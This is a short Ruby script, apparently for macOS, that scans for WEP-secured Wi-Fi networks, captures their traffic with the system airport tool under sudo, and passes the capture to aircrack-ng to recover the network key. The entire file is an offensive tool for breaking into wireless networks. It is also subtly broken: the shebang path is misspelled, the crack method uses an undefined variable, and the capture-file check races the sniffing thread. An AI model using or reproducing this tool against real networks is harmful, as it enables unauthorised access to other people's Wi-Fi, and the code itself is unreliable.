#!/use/bin/env ruby

AIRPORT_EXECUTABLE = "/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport"

module Sniffit
  
  class Network
    attr_accessor :ssid, :bssid, :strength, :channel
  end
  
  class Looper
    def self.every_n_seconds(n)
      loop do
        before = Time.now
        yield
        interval = n-(Time.now-before)
        sleep(interval) if interval > 0
      end
    end
  end
  
  class Sniffer
    
    attr_reader :cap_file,:networks
    
    def self.sniff
      Sniffit::Sniffer.new.start()
    end
    
    def initialize
      super
      @previous_size = 0
    end
    
    def find_wep_networks()
      networks = `#{AIRPORT_EXECUTABLE} scan | grep WEP`.split(/\n/)
      
      networks.map! do |line|
        parts = line.strip.split(/\s+/)
        network = Sniffit::Network.new
        network.ssid = parts[0]
        network.bssid = parts[1]
        network.strength = 100+parts[2].to_i
        network.channel = parts[3]
        network
      end
      
      return networks
    end
    
    def sniff(network)
      return false if network.is_a?(Network) == false
      
      before_cap_files = Dir.entries("/tmp/").select { |filename|
        filename.include?(".cap")
      }
      
      Thread.new do
        `sudo #{AIRPORT_EXECUTABLE} sniff #{network.channel}`
      end
      
      after_cap_files = Dir.entries("/tmp/").select { |filename|
        filename.include?(".cap")
      }
      
      @cap_file = (after_cap_files-before_cap_files).first
      puts @cap_file
      return true
    end
    
    def crack(bssid)
      cracking_output = `aircrack-ng -b #{bssid} /tmp/#{@cap_file}`.strip

      failed = cracking_output.split("Failed. Next try with").length > 1
      return nil if failed
      return output.split("KEY FOUND! [ ")[1].split(" ").first.strip.gsub(/:/,"")
    end
    
  end
end